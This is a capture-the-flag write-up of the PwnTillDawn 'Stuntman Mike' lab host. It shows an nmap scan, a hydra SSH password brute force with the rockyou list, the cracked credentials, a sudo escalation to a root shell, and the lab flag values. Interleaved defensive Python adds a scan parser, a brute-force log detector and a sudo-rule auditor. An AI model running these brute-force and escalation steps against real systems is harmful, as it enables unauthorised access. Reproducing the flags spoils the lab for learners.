
Stuntman Mike

Port Scan Results ⤵️

┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.166]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.150.150.166
Nmap scan report for 10.150.150.166
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 (protocol 2.0)
| ssh-hostkey: 
|   2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)
|   256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA)
|_  256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)
8089/tcp open  ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:15:13
|_Not valid after:  2022-10-24T09:15:13
|_http-server-header: Splunkd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
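As an added example (mine, not the post author's), here is a small Python parser for the `nmap -oN` normal-output format shown above, with a review step that flags what a defender would act on in this result: the splunkd management port reachable from the scanning host, the default Splunk certificate, and the fact that the certificate expired well before the scan date. The sample input is the post's own scan trimmed to the open-port lines; the script-name heuristic and the `review_exposures` checks are my assumptions about how to classify the output, not anything nmap provides.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime

# Constructed sample: the open-port and NSE lines from the post's scan, in the
# layout that `nmap -oN` writes (one "PORT/PROTO STATE SERVICE VERSION" line per
# port, followed by "|"-prefixed script output).
SAMPLE_NMAP = """\
Nmap scan report for 10.150.150.166
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 (protocol 2.0)
| ssh-hostkey: 
|   2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)
|_  256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)
8089/tcp open  ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:15:13
|_Not valid after:  2022-10-24T09:15:13
|_http-server-header: Splunkd
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
# Heuristic (my assumption): a script block starts with a lowercase NSE script
# name and a colon ("ssh-hostkey:"); continuation lines such as
# "Not valid after:" contain spaces or start with a digit, so they do not match.
SCRIPT_RE = re.compile(r"^(?P<name>[a-z0-9][a-z0-9_-]*):(?P<rest>.*)$")


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)  # script name -> list of output lines


def parse_nmap_normal(text):
    """Parse `-oN` output into PortEntry records with their NSE script output."""
    entries, current, script = [], None, None
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            current = PortEntry(int(m["port"]), m["proto"], m["state"],
                                m["service"], m["version"].strip())
            entries.append(current)
            script = None
            continue
        if current is None or not raw.startswith("|"):
            continue
        body = raw[1:].lstrip("_").strip()  # drop the "| " / "|_" prefixes
        s = SCRIPT_RE.match(body)
        if s:
            script = current.scripts.setdefault(s["name"], [])
            if s["rest"].strip():
                script.append(s["rest"].strip())
        elif script is not None and body:
            script.append(body)
    return entries


def review_exposures(entries, as_of_iso):
    """Return (port, message) findings a defender would act on: an exposed
    management service, a default certificate, an expired certificate."""
    as_of = datetime.fromisoformat(as_of_iso)
    findings = []
    for e in entries:
        if e.state != "open":
            continue
        if "Splunkd" in e.version:
            findings.append((e.port, "splunkd management port reachable from the scanning host"))
        for line in e.scripts.get("ssl-cert", []):
            if "SplunkServerDefaultCert" in line:
                findings.append((e.port, "default Splunk self-signed certificate in use"))
            elif line.startswith("Not valid after:"):
                expiry = datetime.fromisoformat(line.split(":", 1)[1].strip())
                if expiry < as_of:
                    findings.append((e.port, f"TLS certificate expired on {expiry.date()}"))
    return findings


if __name__ == "__main__":
    for port, msg in review_exposures(parse_nmap_normal(SAMPLE_NMAP), "2023-09-18T14:00:00"):
        print(f"{port}/tcp: {msg}")
```

Feed it a real `Nmap_results.txt` and a scan date and it produces the same three findings for this host; the script-name heuristic is deliberately conservative, so a script whose output it cannot attribute simply stays attached to the previous block rather than being dropped.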

Web Enumeration ⤵️

The scan shows splunkd open on port 8089:


While trying to SSH into this machine, the login banner handed me a flag before any authentication →

┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.166]
└─$ ssh 10.150.150.166            
The authenticity of host '10.150.150.166 (10.150.150.166)' can't be established.
ED25519 key fingerprint is SHA256:wCj0PIambullovu4ygX2+b6IVT8d8x2gEDeOB2D3OE4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.150.150.166' (ED25519) to the list of known hosts.
You are attempting to login to stuntman mike's server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360
kali@10.150.150.166's password: 
Permission denied, please try again.
kali@10.150.150.166's password: 
Permission denied, please try again.
kali@10.150.150.166's password: 
kali@10.150.150.166: Permission denied (publickey,password).

Then I brute-forced the SSH login for the username mike with hydra and the rockyou wordlist, and it found the password →

┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.166]
└─$ hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://10.150.150.166 -t 4 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-18 14:34:52
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.150.150.166:22/
[22][ssh] host: 10.150.150.166   login: mike   password: babygirl
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-18 14:35:05
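From the defender's side, a password-guessing run like this is loud: sshd writes one `Failed password` line per attempt to `/var/log/auth.log`, and the `Accepted password` that follows a burst of failures is the event a responder should be paged for. As an added example (my code, not part of the post), here is a sliding-window detector run over constructed sshd log lines; the source addresses 198.51.100.7 and 203.0.113.9 are documentation-range placeholders, and the alert names, threshold and window are my own choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd lines in Ubuntu /var/log/auth.log syslog format (not taken
# from the post). Six rapid failures and then a success from one source; a single
# stray failure from another source that should not alert.
SAMPLE_AUTH_LOG = """\
Sep 18 14:34:52 stuntmanmike sshd[2101]: Failed password for mike from 198.51.100.7 port 40210 ssh2
Sep 18 14:34:53 stuntmanmike sshd[2103]: Failed password for mike from 198.51.100.7 port 40212 ssh2
Sep 18 14:34:54 stuntmanmike sshd[2105]: Failed password for mike from 198.51.100.7 port 40214 ssh2
Sep 18 14:34:55 stuntmanmike sshd[2107]: Failed password for mike from 198.51.100.7 port 40216 ssh2
Sep 18 14:34:56 stuntmanmike sshd[2109]: Failed password for mike from 198.51.100.7 port 40218 ssh2
Sep 18 14:34:57 stuntmanmike sshd[2111]: Failed password for mike from 198.51.100.7 port 40220 ssh2
Sep 18 14:35:05 stuntmanmike sshd[2130]: Accepted password for mike from 198.51.100.7 port 40230 ssh2
Sep 18 14:35:05 stuntmanmike sshd[2130]: pam_unix(sshd:session): session opened for user mike by (uid=0)
Sep 18 14:36:10 stuntmanmike sshd[2150]: Failed password for invalid user kali from 203.0.113.9 port 50001 ssh2
"""

LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<event>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_ts(text, year=2023):
    # syslog timestamps carry no year; the caller supplies one (2023 for the sample)
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return alerts as (kind, source_ip, user, timestamp) tuples.

    'bruteforce' fires once when a source reaches `threshold` failed logins
    inside `window_s` seconds; 'success_after_bruteforce' fires when a login
    from that source succeeds while its failure window is still hot.
    """
    recent_failures = defaultdict(deque)  # source ip -> failure timestamps in window
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, ip, user = parse_ts(m["ts"]), m["ip"], m["user"]
        q = recent_failures[ip]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # age out failures that fell outside the window
        if m["event"] == "Failed":
            q.append(ts)
            if len(q) == threshold:
                alerts.append(("bruteforce", ip, user, ts))
        elif len(q) >= threshold:
            alerts.append(("success_after_bruteforce", ip, user, ts))
    return alerts


if __name__ == "__main__":
    for kind, ip, user, ts in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(f"{ts:%b %d %H:%M:%S} {kind:<26} src={ip} user={user}")
```

Hydra's `-t 4` means four parallel connections, so on a real host the failures arrive even faster than in the sample; `sshd` limits that with `MaxAuthTries` and tools such as fail2ban implement exactly this window-and-threshold logic against the same log lines.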

Credentials are →

mike : babygirl

Now it's time to SSH in →

SSH Login ⤵️

┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.166]
└─$ ssh mike@10.150.150.166       
You are attempting to login to stuntman mike's server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360
mike@10.150.150.166's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Sep 18 09:42:35 UTC 2023

  System load:  0.01               Processes:            167
  Usage of /:   28.7% of 19.56GB   Users logged in:      1
  Memory usage: 20%                IP address for ens33: 10.150.150.166
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

18 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

*** System restart required ***
Last login: Tue Apr 21 08:57:00 2020
mike@stuntmanmike:~$

Now let's check how this user can get me to root →

mike@stuntmanmike:~$ sudo -l
[sudo] password for mike: 
Sorry, try again.
[sudo] password for mike: 
Matching Defaults entries for mike on stuntmanmike:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on stuntmanmike:
    (ALL : ALL) ALL
mike@stuntmanmike:~$ sudo /bin/bash -i
root@stuntmanmike:~# whoami
root
root@stuntmanmike:~# id
uid=0(root) gid=0(root) groups=0(root)
root@stuntmanmike:~# cd /root
root@stuntmanmike:/root# ls -al
total 36
drwx------  4 root root 4096 May 14  2020 .
drwxr-xr-x 23 root root 4096 Jan 30  2022 ..
-rw-------  1 root root  721 Apr 21  2020 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  115 May 14  2020 CAM.shortcut
-rw-r--r--  1 root root   41 May 27  2019 FLAG37
drwxr-xr-x  3 root root 4096 May 27  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 May 27  2019 .ssh
root@stuntmanmike:/root# cat FLAG37 
28d10397e475a50fc0d6c73f7c23355ebdf15a3f
root@stuntmanmike:/root#
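The `(ALL : ALL) ALL` entry is the whole privilege-escalation story: mike's guessable SSH password is also the password sudo asks for, so a correct guess on port 22 is a root shell. As an added example (my code, not the post author's), here is a parser for `sudo -l` output that grades entries the way an audit script would; the first sample is the post's own output with the password prompts removed, the second is a constructed, scoped entry for a hypothetical `ops` account to show what a defensible rule looks like by comparison.

```python
import re
from dataclasses import dataclass

# The post's `sudo -l` output for mike (password prompt lines removed).
SUDO_L_MIKE = r"""Matching Defaults entries for mike on stuntmanmike:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on stuntmanmike:
    (ALL : ALL) ALL
"""

# Constructed counter-example (not from the post): a scoped entry for a
# hypothetical 'ops' account that may only restart Splunk and read logs.
SUDO_L_SCOPED = """\
User ops may run the following commands on stuntmanmike:
    (root) NOPASSWD: /usr/bin/systemctl restart splunk
    (root) /usr/bin/journalctl, /usr/bin/less /var/log/auth.log
"""

# "(runas) TAG: cmd1, cmd2" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}


@dataclass
class SudoRule:
    runas: str       # text inside the parentheses, e.g. "ALL : ALL" or "root"
    nopasswd: bool
    commands: list


def parse_sudo_l(text):
    """Collect the rule lines that follow 'may run the following commands'."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line.strip() else None
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        commands = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        rules.append(SudoRule(m["runas"].strip(), "NOPASSWD" in tags, commands))
    return rules


def assess(rules):
    """Return (severity, message) findings; my grading, not sudo's."""
    findings = []
    for r in rules:
        runas_user = r.runas.split(":")[0].strip()
        root_equiv = runas_user in ("ALL", "root")
        if root_equiv and "ALL" in r.commands:
            suffix = " without a password" if r.nopasswd else ""
            findings.append(("critical", f"unrestricted sudo as ({r.runas}){suffix}"))
        elif root_equiv and any(c.split()[0] in SHELLS for c in r.commands):
            findings.append(("critical", "sudo may launch an interactive shell as root"))
        elif r.nopasswd:
            findings.append(("medium", "passwordless sudo for: " + ", ".join(r.commands)))
    return findings


if __name__ == "__main__":
    for name, text in (("mike", SUDO_L_MIKE), ("ops", SUDO_L_SCOPED)):
        for severity, msg in assess(parse_sudo_l(text)):
            print(f"[{severity}] {name}: {msg}")
```

On this box the first sample grades `critical`, which is why `sudo /bin/bash -i` worked straight away; the scoped sample only earns a `medium` for the passwordless restart, and even that has no path to a shell.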

This one was a waste of time for me once I had found the username by trial and error.

If you have any questions or suggestions, please leave a comment below. Thank You !

This post is licensed under CC BY 4.0 by the author.